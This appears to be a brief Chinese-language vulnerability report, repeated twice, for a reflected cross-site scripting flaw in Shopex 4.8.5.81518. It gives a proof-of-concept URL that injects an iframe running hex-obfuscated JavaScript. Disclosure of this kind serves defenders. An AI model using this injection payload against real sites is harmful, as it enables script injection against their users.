VULHUB ™

### 简要描述： Shopex 4.8.5.81518 反射型XSS ### 详细说明： ``` http://site/shopex-single-4.8.5.81518/index.php?product-"><iframe src=javascript:window["\x61\x6c\x65\x72\x74"](0x1) -30763-viewpic.html ``` 编码一下就能 alert(1) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201312/1016204991e56ba772f0266ce04944c8239e649a.jpg" alt="shopex_xss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1016204991e56ba772f0266ce04944c8239e649a.jpg)

### 简要描述： Shopex 4.8.5.81518 反射型XSS ### 详细说明： ``` http://site/shopex-single-4.8.5.81518/index.php?product-"><iframe src=javascript:window["\x61\x6c\x65\x72\x74"](0x1) -30763-viewpic.html ``` 编码一下就能 alert(1) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201312/1016204991e56ba772f0266ce04944c8239e649a.jpg" alt="shopex_xss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1016204991e56ba772f0266ce04944c8239e649a.jpg)